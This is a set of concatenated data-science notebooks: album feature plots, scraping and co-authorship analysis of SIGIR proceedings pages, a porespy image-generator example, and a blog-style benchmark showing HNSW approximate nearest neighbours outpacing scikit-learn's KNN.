levels = np.tile([-5, 5, -3, 3, -1, 1],
int(np.ceil(len(dates)/6)))[:len(dates)]
fig, ax = plt.subplots(figsize=(20, 8), constrained_layout=True)
ax.set(title='Album Release Dates')
ax.vlines(dates, 0, levels, color='tab:red')
ax.plot(dates, np.zeros_like(dates), '-o',
color='k', markerfacecolor='w')
for d, l, r in zip(dates, levels, names):
ax.annotate(r, xy=(d, l),
xytext=(-3, np.sign(l)*3), textcoords="offset points",
horizontalalignment="right",
verticalalignment="bottom" if l > 0 else "top")
ax.xaxis.set_major_locator(mdates.MonthLocator(interval=12)) # by year
ax.xaxis.set_major_formatter(mdates.DateFormatter("%Y"))
plt.setp(ax.get_xticklabels(), rotation=45, ha="right"); # semicolon stopping label output
ax.margins(y=0.1, x=0.1)
ax.get_yaxis().set_visible(False)
plt.show()
# -
corr_mat = by_album.corr(method='pearson').round(2)
sorted_mat = corr_mat.unstack().sort_values() \
[:-(len(by_album.columns))-1] \
[::2]
sorted_mat = sorted_mat.sort_values(ascending=False)
top_5_corr = sorted_mat.head(5)
bottom_5_corr = sorted_mat.tail(5)
print('Top 5 positive correlations:\n{}\n\nTop 5 negative correlations:\n{}' \
.format(top_5_corr, bottom_5_corr))
# +
# messy attributes
def graphTopCorrs(signum, idx11, idx12, idx21, idx22, pallette='Set1'):
var1 = str(signum[idx11:idx12]).split()[0]
var2 = str(signum[idx21:idx22]).split()[1]
plt.figure(figsize=(10, 10))
plt.title("{var1} vs. {var2} for {artist} (by album)".format(var1 = var1,
var2 = var2,
artist = artist_name), size=18)
plt.tight_layout()
ax = sns.scatterplot(data=by_album,
x=var1,
y=var2,
s=1000,
marker='o',
hue='album_name',
palette=pallette)
sns.set_style("ticks")
plt.xlabel(var1, size=15)
plt.ylabel(var2, size=15)
h,labs = ax.get_legend_handles_labels()
ax.legend(h[1:len(album_names_dates)+1],
labs[1:int(len(album_names_dates))+1], loc='best', title='Albums')
# -
graphTopCorrs(top_5_corr, 0,1,0,1)
graphTopCorrs(bottom_5_corr, 0,1,0,1)
# +
# The largest negative correlation for this artist
var1 = str(bottom_5_corr[0:1]).split()[0]
var2 = str(bottom_5_corr[0:1]).split()[1]
plt.figure(figsize=(10, 10))
plt.title("{var1} vs. {var2} for {artist} (by album)".format(var1 = var1,
var2 = var2,
artist = artist_name), size=18)
plt.tight_layout()
ax = sns.scatterplot(data=by_album,
x=var1,
y=var2,
s=1000,
marker='o',
hue='album_name',
palette='Set1')
sns.set_style("ticks")
plt.xlabel(var1, size=15)
plt.ylabel(var2, size=15)
h,labs = ax.get_legend_handles_labels()
ax.legend(h[1:len(album_names_dates)+1],
labs[1:int(len(album_names_dates))+1], loc='best', title='Albums')
# +
# The largest positive correlation for this artist
import warnings
warnings.filterwarnings("ignore")
var1 = str(top_5_corr[0:1]).split()[0]
var2 = str(top_5_corr[0:1]).split()[1]
plt.figure(figsize=(10, 10))
plt.title("{var1} vs. {var2} for {artist} (by album)".format(var1 = var1,
var2 = var2,
artist = artist_name), size=18)
plt.tight_layout()
ax = sns.scatterplot(data=by_album,
x=var1,
y=var2,
s=1000,
hue='album_name',
palette='Set1')
h,labs = ax.get_legend_handles_labels()
ax.legend(h[1:len(album_names_dates)+1],
labs[1:int(len(album_names_dates))+1], loc='best', title='Albums')
# +
plt.figure(figsize=(10,10))
ax = sns.scatterplot(data=by_album,
x='loudness', y='energy',
hue='album_name',
palette='Set1',
# size='duration_ms',
s=1000,
sizes=(50,1000),
alpha=0.7)
# plt.xlabel("Average Song Energy", size=15)
# plt.ylabel("Average Song Tempo", size=15)
# plt.title("Album Energy and Tempo for {artist}".format(artist = 'None'), size=18)
plt.tight_layout()
# display legend without `size` attribute
h,labs = ax.get_legend_handles_labels()
ax.legend(h[1:len(album_names_dates)+1],
labs[1:int(len(album_names_dates))+1], loc='best', title=None)
| spotify_proj/.ipynb_checkpoints/spotify-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Scripts for Extracting and Processing the SIGIR data
# +
import time
import os.path
from requests import get # to make GET request
def download(url, file_name):
# open in binary mode
headers={
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'
}
with open(file_name, "wb") as f:
# get request
response = get(url,headers=headers)
# write to file
f.write(response.content)
def make_sp_name(spid):
return "data/sigir-{0}.html".format(spid)
def get_paper_id(paper_url):
i = paper_url.find('=')
j = paper_url.find('&',i)
pid = paper_url[i+1:j]
return pid
# -
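A quick standalone check of the URL-parsing logic above (the function is restated here so the cell runs on its own):

```python
# Restated from above: pull the paper id out of an ACM citation URL
def get_paper_id(paper_url):
    i = paper_url.find('=')
    j = paper_url.find('&', i)
    return paper_url[i + 1:j]

url = 'http://dl.acm.org/citation.cfm?id=800096&preflayout=flat'
print(get_paper_id(url))  # → 800096
```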
# ## Download all the SIGIR proceedings HTML pages from ACM
# +
# These are the ids of all the SIGIR proceedings 1971 - 2017
spids40 = ['800096','511706','636669','511285','511754','636713','511793','636805','253495','253168',
'42005','62437','96749','75334','122860','133160','160688','188490','215206','243199','258525','290941'
,'564376','383952','345508','312624','290941','860435','1008992','1076034','1148170','1277741','1390334',
'1571941','1835449','2009916','2348283','2484028','2600428','2766462','2911451','3077136']
spids = spids40
spfiles = []
# Only downloads pages that are not already/previously downloaded
for spid in spids:
sigir_url = "http://dl.acm.org/citation.cfm?id={0}&preflayout=flat".format(spid)
sigir_head_file = make_sp_name(spid)
spfiles.append(sigir_head_file)
print(sigir_head_file)
if not os.path.isfile(sigir_head_file):
print("downloading " + sigir_head_file)
download(sigir_url, sigir_head_file)
time.sleep(1)
# -
# ## Functions for extracting different pieces of data from the SIGIR pages
# +
import re
def extract_url(line):
i = line.find('citation.cfm')
j = line.find('"',i+1)
url = line[i:j]
return url
def remove_non_article_links(line, spid):
r = ['flat','tabs','prox']
r.append(spid)
for w in r:
if line.find(w)>0:
line = ""
return line
def strip_cfs(line):
i = line.find("&CFID")
sline = line[0:i+1]
return sline
def parse_out_papers(file_name,spid):
papers = []
with open(file_name, "r") as f:
line = f.readline()
while line:
if "citation" in line:
line = remove_non_article_links(line,spid)
line = strip_cfs(line)
url = extract_url(line)
if url:
papers.append('http://dl.acm.org/{0}{1}'.format(url,'&preflayout=flat'))
line = f.readline()
return papers
def extract_author_id(line):
i = line.find('author_page.cfm')
j = line.find('"',i+1)
aid = line[i:j]
return aid
def parse_out_authors(file_name):
authors = []
with open(file_name, "r") as f:
line = f.readline()
while line:
if "author_page" in line:
line = strip_cfs(line)
aid = extract_author_id(line)
if aid:
authors.append(aid)
line = f.readline()
return authors
def parse_out_year(file_name):
year = 0
reyear = re.compile(r'\d\d\d\d Proceeding')
with open(file_name, "r") as f:
line = f.readline()
while line:
if " Proceeding" in line:
d = reyear.search(line)
if d:
year = int(d.group()[0:4])
break
line = f.readline()
return year
# -
# ## Calculate which authors had the greatest span between papers at SIGIR
# +
def max_span(year_list):
#finds the max span between years
max_span = 0
years = (0,0)
if len(year_list) == 1:
return max_span, years
prev_year = year_list[0]
for curr_year in year_list[1:]:
curr_span = curr_year-prev_year
if curr_span > max_span:
max_span = curr_span
years = (prev_year,curr_year)
prev_year = curr_year
return max_span, years
# year author dict
ya = {}
for spf in spfiles:
authors = parse_out_authors(spf)
year = parse_out_year(spf)
ya[year] = authors
#print(year, len(authors))
# author year dict
au = {}
for year in ya:
for author in ya[year]:
if author in au:
yl = au[author]
else:
yl = []
yl.append(year)
au[author] = yl
# Print out the authors where the span is greater than 20 years
for author in au:
(ms,ys) = max_span(au[author])
if ms > 17:
print(author, ms, ys)
# -
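The span logic can be sanity-checked in isolation (`max_span` is restated so this cell is self-contained):

```python
def max_span(year_list):
    # Restated from above: widest gap between consecutive publication years
    best, years = 0, (0, 0)
    if len(year_list) == 1:
        return best, years
    prev = year_list[0]
    for curr in year_list[1:]:
        if curr - prev > best:
            best, years = curr - prev, (prev, curr)
        prev = curr
    return best, years

print(max_span([1990, 1995, 2010]))  # → (15, (1995, 2010))
```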
print(au["author_page.cfm?id=81100618039"])
# ## Count how many references and how many citations each paper has
def count_references(file_name):
references = 0
citations = 0
year = 0
redate = re.compile(r'\d\d\d\d Article')
do_count = 0 # flag
with open(file_name, "r") as f:
line = f.readline()
while line:
if "REFERENCES" in line:
do_count = 1
if ("CITED BY" in line):
do_count = 2
if ("INDEX TERMS" in line):
do_count = 0
if do_count == 1:
if '"abstract"' in line:
references += 1
if do_count == 2:
a = '"abstract"'
if a in line:
i = line.find(a)
j = line.find(' ',i)
c = line[i+len(a)+1:j+1]
citations = c.strip()
do_count = 0
if " Article" in line:
d = redate.search(line)
if d:
year = d.group()[0:4]
line = f.readline()
if references > 0:
references = references -1
return [year, references, citations]
# An example for paper id 2767723, pulling out the year, references, and citations.
count_references('data/2767723.html')
def extract_paper_authors(file_name):
""" extracts out the authors for a given paper.
returns a list of the co-authors
"""
authors = []
apc = 'author_page.cfm'
l = len(apc)
do_count = 0
with open(file_name, "r") as f:
line = f.readline()
while line:
if "Published in:" in line:
break
if "Publication of" in line:
break
if "author_page" in line:
i = line.find(apc)
j = line.find('&',i+1)
aid = line[i+l+4:j]
#print(aid)
if aid:
authors.append(aid)
line = f.readline()
return authors
# +
a = extract_paper_authors('data/564499.html')
print(a)
a = extract_paper_authors('data/42021.html')
print(a)
# -
def make_node_list(authors):
x = []
y = []
for a in authors:
for b in authors:
if a != b:
x.append(a)
y.append(b)
print(x,y)
a = ['1','2','3']
make_node_list(a)
# ## For each proceedings HTML page, extract all the papers
counts = []
spc = []
for spid in spids:
sigir_head_file = make_sp_name(spid)
papers = parse_out_papers(sigir_head_file, spid)
# for each paper in the proceedings, download the paper
for p in papers:
pid = get_paper_id(p)
paper_file = 'data/{0}.html'.format(pid)
if not os.path.isfile(paper_file):
download(p, paper_file)
time.sleep(2)
[year, refs,cites] = count_references(paper_file)
counts.append([pid, year, refs, cites])
spc.append(len(papers))
# Save the counts data to file
with open("counts.txt", "w") as f:
for c in counts:
f.write("{0} {1} {2} {3}\n".format(c[0], c[1], c[2], c[3] ))
def compute_closest(mref, mcite, threshold):
counts = []
with open("counts.txt",'r') as f:
line = f.readline()
while line:
(spid, year, refs, cites) = line.split()
cites = int( cites.replace(',','') )
refs = int(refs)
score = ((refs-mref)*(refs-mref)) + ((cites-mcite)*(cites-mcite))
counts.append([spid, int(year), refs, cites, score])
if score < threshold:
print("paper id: {0} year: {1} refs: {2} cites: {3} score: {4}".format( spid, year, refs, cites, score))
print("http://dl.acm.org/citation.cfm?id={0}".format(spid))
line = f.readline()
# ## Closest paper(s) to 40 refs and 40 cites
compute_closest(40,40,10)
#
# +
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
plt.style.use('ggplot')
counts = []
with open("counts.txt",'r') as f:
line = f.readline()
while line:
(spid, year, refs, cites) = line.split()
cites = int( cites.replace(',','') )
refs = int(refs)
counts.append([spid, int(year), refs, cites])
line = f.readline()
df = pd.DataFrame(counts)
m = df.mean()
print(m)
# -
len(counts)
# ## Closest paper(s) to the mean number of refs and mean number of cites
mref = m[2]
mcite = m[3]
print(mref,mcite)
compute_closest(mref,mcite,0.3)
# ## Random plots
#times = pd.DatetimeIndex(df[1])
#grouped = df.groupby(df[1]).mean()
plt.figure(figsize=(25,5))
plt.plot(df[3])
plt.show()
df.head()
times = pd.DatetimeIndex(df[1])
grouped = df.groupby(df[1]).mean()
plt.figure(figsize=(25,5))
plt.plot(grouped[3])
plt.xlim([1971,2017])
plt.show()
# +
pc = 0
x = []
y = []
counts = {}
solo_counts = {}
solo_papers = {}
for spid in spids:
sigir_head_file = make_sp_name(spid)
papers = parse_out_papers(sigir_head_file, spid)
# for each paper in the proceedings, download the paper
for p in papers:
pid = get_paper_id(p)
paper_file = 'data/{0}.html'.format(pid)
pc +=1
authors = extract_paper_authors(paper_file)
l = len(authors)
if l in counts:
counts[l] += 1
else:
counts[l] = 1
if (len(authors)>1):
for a in authors:
for b in authors:
if a != b:
x.append(a)
y.append(b)
elif (len(authors)==1):
a = authors[0]
if a in solo_counts:
solo_counts[a] += 1
else:
solo_counts[a] = 1
if a in solo_papers:
solo_papers[a].append(pid)
else:
solo_papers[a] = [pid]
#for c in counts:
# print(c, counts[c])
for a in solo_counts:
if solo_counts[a] > 6:
print(a, solo_counts[a])
print(solo_papers[a])
with open("graph.txt", "w") as f:
for i in range(0,len(x)):
f.write("{0} {1}\n".format(x[i], y[i] ))
print(pc)
# +
import networkx as nx
G = nx.Graph()
with open("graph.txt",'r') as f:
line = f.readline()
while line:
(a,b) = line.split()
G.add_edge(a,b)
line = f.readline()
#G.add_edge('81316487451','81100617179')
#G.add_edge('81100617179','81316487451')
#G.add_edge('81316487451','81100113287')
#G.add_edge('81100113287','81316487451')
# -
short = nx.shortest_path_length(G)
for key in short:
a = short[key]
sum = 0
if len(a) > 119:
for b in a:
sum += a[b]
m = float(sum)/float(len(a))
if m < 3.8:
print(key, len(a), sum, m)
# Output (author names anonymized in this dump):
# <NAME> (3.75)
# <NAME> (3.76)
# <NAME> (3.77)
# <NAME> (3.78)
# <NAME> (3.78)
#print(short['81100617179'])
a = short['81100617179'] # <NAME>
a = short['81100625548'] # <NAME>
sum = 0
for b in a:
sum += a[b]
m = float(sum)/float(len(a))
print(m)
# +
#print(short['81100617179'])
# -
len(short)
nx.draw_networkx(G)
import matplotlib.pyplot as plt
plt.draw()
| practice scripts.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # `bundle_of_tubes`
# Create a 3D image of a bundle of tubes, in the form of a rectangular plate with randomly sized holes through it.
import matplotlib.pyplot as plt
import numpy as np
import porespy as ps
import inspect
inspect.signature(ps.generators.bundle_of_tubes)
# ## `spacing`
# Controls how far apart each pore is. Note that this limits the maximum size of each pore since they are prevented from overlapping.
# +
fig, ax = plt.subplots(1, 2, figsize=[8, 4])
np.random.seed(10)
shape = [300, 300]
spacing = 10
im = ps.generators.bundle_of_tubes(shape=shape, spacing=spacing)
ax[0].imshow(im, origin='lower', interpolation='none')
ax[0].axis(False)
spacing = 15
im = ps.generators.bundle_of_tubes(shape=shape, spacing=spacing)
ax[1].imshow(im, origin='lower', interpolation='none')
ax[1].axis(False);
# -
# ## `distribution`
# The default size distribution is uniform (i.e. random) with sizes ranging between 3 and ``spacing - 1``. To use a different distribution, specify a predefined ``scipy.stats`` object. If care is not taken to ensure the distribution only returns values between 3 and ``spacing - 1``, the values are clipped accordingly.
# +
import scipy.stats as spst
fig, ax = plt.subplots(1, 2, figsize=[8, 4])
dst = spst.norm(loc=8, scale=1)
im = ps.generators.bundle_of_tubes(shape=shape, spacing=spacing, distribution=dst)
ax[0].imshow(im, origin='lower', interpolation='none')
ax[0].axis(False)
dst = spst.norm(loc=10, scale=4)
im = ps.generators.bundle_of_tubes(shape=shape, spacing=spacing, distribution=dst)
ax[1].imshow(im, origin='lower', interpolation='none')
ax[1].axis(False);
| examples/generators/reference/bundle_of_tubes.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="8e4nFKI9DzZl"
# # KNN (K-Nearest Neighbors) is Dead!
# [](https://colab.research.google.com/github/stephenleo/adventures-with-ann/blob/main/knn_is_dead.ipynb)
#
# Long live ANNs for their whopping 380X speedup over sklearn's KNN while delivering 99.3% similar results.
#
# 
#
# We're living through an extinction-level event. No, not COVID19, I'm talking about the demise of the popular KNN algorithm that is taught in pretty much every Data Science course! Read on to find out what's replacing this staple in every Data Scientists' toolkit.
#
# # KNN Background
# Finding "K" similar items to any given item is widely known in the machine learning community as a "similarity" search or "nearest neighbor" (NN) search. The most widely known NN search algorithm is the K-Nearest Neighbors (KNN) algorithm. In KNN, given a collection of objects like an e-commerce catalog of handphones, we can find a small number (K) of nearest neighbors from the entire catalog for any new search query. For example, in the table below, if you set K = 3, then the 3 nearest neighbors of each "iPhone" are other iPhones. Similarly, the 3 nearest neighbors of each "Samsung" are other Samsungs.
#
# | Title |
# |----------------------------------------------------|
# | Apple iPhone 12/12 Pro and 12 Pro max |
# | APPLE iPhone 12 2020 256GB SIM Free / Smart Phone |
# | Samsung Galaxy Note20 - Ultra/5G/LTE/4G w Warranty |
# | APPLE IPHONE 12PRO MAX 256GB ONE YEAR WARRANTY |
# | New Release Samsung Note 20 4G / Note 20 Ultra 5G |
# | SAMSUNG GALAXY NOTE 20 ULTRA 5G |
#
# ## Issue with KNN
# While KNN is great at finding similar items, it finds neighbors using an exhaustive pairwise distance computation. If your data contains 1000 items, then to find the K=3 nearest neighbors of a new product, the algorithm needs to perform 1000 distance computations of the new product to all the other products in your database. Well, that's not too bad, yet. But imagine a real-world Customer-to-Customer (C2C) marketplace with millions of products in the database and potentially thousands of new products uploaded every day. Comparing each new product to all the millions of products is wasteful and takes too much time, a.k.a not-scalable <b><i>at all</i></b>.
#
# ## The Solution
# The solution to scale Nearest Neighbors to large data volumes is to sidestep the brute force distance computations completely and instead use a more sophisticated class of algorithms called Approximate Nearest Neighbors (ANN).
# + [markdown] id="Sx0tma05DzZ0"
# # Approximate Nearest Neighbors (ANN)
# Strictly speaking, ANNs are a class of algorithms in which a small number of errors are allowed during the NN search. But in a real-world C2C marketplace where the number of "real" neighbors is higher than the "K" nearest neighbors being searched, ANNs can achieve remarkable accuracy on par with brute-force KNN within a fraction of the time. There are several ANN algorithms such as
# 1. Spotify's [ANNOY](https://github.com/spotify/annoy)
# 2. Google's [ScaNN](https://github.com/google-research/google-research/tree/master/scann)
# 3. Facebook's [Faiss](https://github.com/facebookresearch/faiss)
# 3. And my personal favourite: Hierarchical Navigable Small World graphs [HNSW](https://github.com/nmslib/hnswlib)
#
# The rest of this post benchmarks the KNN algorithm implemented in Python's `sklearn` to the excellent ANN algorithm called Hierarchical Navigable Small World (HNSW) graphs implemented in Python's `hnswlib` package. I'll use a large [Amazon product dataset](http://deepyeti.ucsd.edu/jianmo/amazon/) which contains 527000 products in the 'Cell Phones & Accessories' category to prove that HNSW is far superior in terms of speed (380X faster, to be precise) while delivering 99.3% similar results to sklearn's KNN.
#
# ## Hierarchical Navigable Small World (HNSW)
# In HNSW [[paper @ arxiv]](https://arxiv.org/abs/1603.09320), the authors describe an ANN algorithm using a multi-layer graph. During element insertion, the HNSW graph is built incrementally by randomly selecting each element's maximum layer with an exponentially decaying probability distribution. This ensures that layer 0 has many elements to enable fine search, while layer 2 has roughly a factor of $e^{-2}$ fewer elements to facilitate coarse search. The nearest neighbor search starts at the topmost layer with a coarse search and proceeds down to the lowest layer, using greedy graph routing to traverse the graph and find the required number of neighbors.
#
#  and ends in the bottom-most layer (fine search)")
#
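The exponentially decaying layer assignment can be illustrated in a few lines. This is a sketch of the idea, not hnswlib's internals; the normalization `mL = 1/ln(M)` is the choice suggested in the paper:

```python
import math
import random
from collections import Counter

def random_layer(mL=1.0 / math.log(16)):  # M = 16, a typical HNSW setting
    # Each element's top layer is drawn with exponentially decaying probability
    return int(-math.log(random.random()) * mL)

random.seed(0)
counts = Counter(random_layer() for _ in range(100_000))
# Layer 0 holds nearly all elements; each higher layer is ~16x sparser
print(sorted(counts.items()))
```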
# ## HNSW Python package
# The whole HNSW algorithm has been written in C++ with Python bindings that can be pip installed on your machine by typing: `pip install hnswlib`. Once you install the package and import it, creating the HNSW graph requires a few steps that I have wrapped into a convenience function below. Once you have created the HNSW index, querying for "K" nearest neighbors is as simple as calling a single line of code as below.
#
# ```
# ann_neighbor_indices, ann_distances = p.knn_query(features, k)
# ```
# + id="CHcoPI26DzZ4"
# !pip install hnswlib
# + id="gMsW2WL3DzZ6"
import hnswlib
import numpy as np
def fit_hnsw_index(features, ef=100, M=16, save_index_file=False):
# Convenience function to create HNSW graph
# features : list of lists containing the embeddings
# ef, M: parameters to tune the HNSW algorithm
num_elements = len(features)
labels_index = np.arange(num_elements)
EMBEDDING_SIZE = len(features[0])
# Declaring index
# possible space options are l2, cosine or ip
p = hnswlib.Index(space='l2', dim=EMBEDDING_SIZE)
# Initing index - the maximum number of elements should be known
p.init_index(max_elements=num_elements, ef_construction=ef, M=M)
# Element insertion
int_labels = p.add_items(features, labels_index)
# Controlling the recall by setting ef
# ef should always be > k
p.set_ef(ef)
# If you want to save the graph to a file
if save_index_file:
p.save_index(save_index_file)
return p
# + [markdown] id="DbRBRmbaDzZ8"
# # KNN vs. ANN Benchmarking Experiment
# ## Plan
# We'll first download a large dataset with 500K+ rows. Then we'll convert a text column to a `300d` embedding vector using the pre-trained `fasttext` sentence vector. Then I'll train both KNN and HNSW ANN models on different lengths of the input data `[1000, 10000, 100000, len(data)]` to measure the impact of data size on the speed. Finally, I'll query `K = 10` and `100` nearest neighbors from both models to measure the impact of `K` on the speed. First, let's import the necessary packages and models. This will take some time as the `fasttext` model needs to be downloaded from the internet.
# + id="tePRE3eADzZ-" outputId="9c596816-9a13-42bd-a2ab-ee73878a921d"
# Imports
# For input data pre-processing
import json
import gzip
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import fasttext.util
fasttext.util.download_model('en', if_exists='ignore') # English pre-trained model
ft = fasttext.load_model('cc.en.300.bin')
# For KNN vs ANN benchmarking
from datetime import datetime
from tqdm import tqdm
from sklearn.neighbors import NearestNeighbors
import hnswlib
# + [markdown] id="pif5Pj1tDzaD"
# ## Data
# We'll use the [Amazon product dataset](http://deepyeti.ucsd.edu/jianmo/amazon/), which contains 527000 products in the 'Cell Phones & Accessories' category. Download the dataset from the link and run the below code to convert it to a data frame. We only need the product title column as we will use it to search for similar products.
#
# If everything ran fine, you should see an output as below.
# + id="DrQGcQ_4DzaF"
# Data: http://deepyeti.ucsd.edu/jianmo/amazon/
data = []
with gzip.open('meta_Cell_Phones_and_Accessories.json.gz') as f:
for l in f:
data.append(json.loads(l.strip()))
# + id="vc-dZD_NDzaG" outputId="ed7a7aa6-7527-45db-f9db-9c74960839b7"
# Pre-Processing: https://colab.research.google.com/drive/1Zv6MARGQcrBbLHyjPVVMZVnRWsRnVMpV#scrollTo=LgWrDtZ94w89
# Convert list into pandas dataframe
df = pd.DataFrame.from_dict(data)
df.fillna('', inplace=True)
# Filter unformatted rows
df = df[~df.title.str.contains('getTime')]
# Restrict to just 'Cell Phones and Accessories'
df = df[df['main_cat']=='Cell Phones & Accessories']
# Reset index
df.reset_index(inplace=True, drop=True)
# Only keep the title columns
df = df[['title']]
# Check the df
print(df.shape)
df.head()
# + [markdown] id="paqn0vFODzaH"
# ## Embedding
# To run any similarity search on textual data, we must first convert it to a numeric vector. A fast and convenient approach uses a pre-trained network's embedding layer, such as the one provided by Facebook's [FastText](https://github.com/facebookresearch/fastText). Since we want all the rows to have the same length vector, irrespective of the number of words in the title, we shall apply the `get_sentence_vector` method on the `title` column in df. Once the embedding is completed, we extract the `emb` column as a list of lists to input into our NN algorithms. Ideally, you would run some text cleaning pre-processing before this step. Also, using a fine-tuned embedding model is generally a good idea.
# + id="3p25PPDrDzaI" outputId="77cdc341-641c-40a0-9965-b9047158f1e5"
# Title Embedding using FastText Sentence Embedding
df['emb'] = df['title'].apply(ft.get_sentence_vector)
# Extract out the embeddings column as a list of lists for input to our NN algos
X = [item.tolist() for item in df['emb'].values]
# + [markdown] id="Ln5LE4nRDzaK"
# ## Benchmarking
# Now that we have the input to our algorithms let's run the benchmarking tests. We will run the test as a loop within a loop of the number of products in the search space and `K` nearest neighbors being searched.
#
# At each iteration, in addition to clocking the time taken by each algorithm, we check the `pct_overlap` as the ratio of the number of KNN nearest neighbors that were also picked up as nearest neighbors by the ANN.
#
# <b>Beware!</b> The whole test ran for ~6 days on an 8-core, 30 GB RAM machine running 24x7, so this could take some time. Ideally, you could speed it up with multiprocessing, since each run is independent of the others.
#
# The output at the end of this run looks as below. As you can already see from the table, the HNSW ANN completely blows away KNN!
# + id="8HCyUaBNDzaL"
# Number of products for benchmark loop
n_products = [1000, 10000, 100000, len(X)]
# Number of neighbors for benchmark loop
n_neighbors = [10, 100]
# Dictionary to save metric results for each iteration
metrics = {'products':[], 'k':[], 'knn_time':[], 'ann_time':[], 'pct_overlap':[]}
for products in tqdm(n_products):
# "products" number of products included in the search space
features = X[:products]
for k in tqdm(n_neighbors):
# "K" Nearest Neighbor search
# KNN
knn_start = datetime.now()
nbrs = NearestNeighbors(n_neighbors=k, metric='euclidean').fit(features)
knn_distances, knn_neighbor_indices = nbrs.kneighbors(features)
knn_end = datetime.now()
metrics['knn_time'].append((knn_end - knn_start).total_seconds())
# HNSW ANN
ann_start = datetime.now()
p = fit_hnsw_index(features, ef=k*10)
ann_neighbor_indices, ann_distances = p.knn_query(features, k)
ann_end = datetime.now()
metrics['ann_time'].append((ann_end - ann_start).total_seconds())
# Average Percent Overlap in Nearest Neighbors across all "products"
pct_overlap_per_product = [len(np.intersect1d(knn_neighbor_indices[i], ann_neighbor_indices[i]))/k for i in range(len(features))]
metrics['pct_overlap'].append(np.mean(pct_overlap_per_product))
metrics['products'].append(products)
metrics['k'].append(k)
metrics_df = pd.DataFrame(metrics)
metrics_df.to_csv('data/metrics_df.csv', index=False)
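The overlap metric above can be checked in isolation: for each product it is the fraction of KNN neighbors that the ANN also returned (made-up neighbor indices here, since the real index arrays come from the long benchmark run):

```python
import numpy as np

# Hypothetical neighbor indices for 2 products with K = 3
knn_idx = np.array([[0, 1, 2], [3, 4, 5]])
ann_idx = np.array([[0, 1, 9], [3, 4, 5]])
k = 3
overlap = [len(np.intersect1d(knn_idx[i], ann_idx[i])) / k
           for i in range(len(knn_idx))]
print(np.mean(overlap))  # rows overlap 2/3 and 3/3
```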
# + id="6-bMJFGdDzaM" outputId="bc294c73-83ed-4ae6-a49a-4d17f554e025"
metrics_df
# + [markdown] id="drWVgv9ZDzaO"
# ## Results
# Let's look at the benchmark results as plots to truly appreciate the magnitude of the difference. I'll use standard `matplotlib` code to plot these graphs. The X-axis is in `log` scale. The difference is spectacular! HNSW ANN knocks KNN out of the park in the time required to query `K=10` and `100` nearest neighbors. When the search space contains `~500K` products, searching for 100 nearest neighbors is 380X faster on ANN!!! At the same time, both KNN and ANN find 99.3% of the same nearest neighbors.
# + id="KPY1O5EaDzaO"
import pandas as pd
import matplotlib.pyplot as plt
# + id="SDlePIcuDzaP" outputId="d36d5740-61c1-4637-e552-d4d7bdfe8881"
metrics_df = pd.read_csv('data/metrics_df.csv')
metrics_df.head()
# + id="WnyBz4dkDzaQ" outputId="8f75b31e-db22-47fe-8ef7-d7f804ec6fa9"
k10_df = metrics_df[metrics_df['k']==10]
k100_df = metrics_df[metrics_df['k']==100]
fig = plt.figure(figsize=(12,5))
fig.patch.set_facecolor('white')
ax1 = fig.add_subplot(1,2,1)
ax1.plot(k10_df['products'].values, k10_df['knn_time'].values, label='KNN', linewidth=2, marker='o')
ax1.plot(k10_df['products'].values, k10_df['ann_time'].values, label='ANN', linewidth=2, marker='s')
ax1.set_xscale('log')
ax1.set_yscale('log')
ax1.set_ylim(0, 500000)
ax1.legend(fontsize=15)
ax1.set_title('K = 10', fontsize=15)
ax1.set_xlabel('Number of Products', fontsize=15)
ax1.set_ylabel('Query Time (s)', fontsize=15)
ax2 = fig.add_subplot(1,2,2)
ax2.plot(k100_df['products'].values, k100_df['knn_time'].values, label='KNN', linewidth=2, marker='o')
ax2.plot(k100_df['products'].values, k100_df['ann_time'].values, label='ANN', linewidth=2, marker='s')
ax2.set_xscale('log')
ax2.set_yscale('log')
ax2.set_ylim(0, 500000)
ax2.legend(fontsize=15)
ax2.set_title('K = 100', fontsize=15)
ax2.set_xlabel('Number of Products', fontsize=15)
plt.suptitle('Nearest Neighbors Query Time (s)', fontsize=15);
# + id="jEnRKB8ADzaW" outputId="9df32220-3dac-4f07-fb4e-6a5f91f09c38"
fig = plt.figure(figsize=(10,5))
fig.patch.set_facecolor('white')
plt.plot(k10_df['products'].values, k10_df['pct_overlap'].values, label='K=10', linewidth=2, marker='o')
plt.plot(k100_df['products'].values, k100_df['pct_overlap'].values, label='K=100', linewidth=2, marker='s')
plt.title('Nearest Neighbors Overlap Ratio between KNN and HNSW ANN', fontsize=15)
plt.xlabel('Number of Products', fontsize=15)
plt.ylabel('Nearest Neighbors Overlap Ratio', fontsize=15)
plt.legend(fontsize=15)
plt.xscale('log')
# + [markdown] id="BxsyJxU0DzaY"
# With these results, I think it's safe to say "KNN is dead!" There is no good reason to use `sklearn`'s KNN anymore. I hope you found this post useful! Thank you for reading!
| knn_is_dead.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
import numpy as np
import os,sys,time
import matplotlib.pyplot as plt
# +
root_dir='/esat/opal/kkelchte/docker_home/tensorflow/log'
data_dir='/esat/opal/kkelchte/docker_home/pilot_data'
##### 20FPS
# log_dirs=sorted([root_dir+'/'+d for d in os.listdir(root_dir) if d.startswith('rec_') and not '_10_' in d])
# data_dirs=sorted([data_dir+'/'+d for d in os.listdir(data_dir) if d.startswith('rec_') and not '_10_' in d])
# log_dirs=[l for dd in data_dirs for l in log_dirs if os.path.basename(l) in dd ]
# log_dirs = log_dirs[1:]
# print "log_dirs: "
# for ld in log_dirs: print ld
# print "data_dirs: "
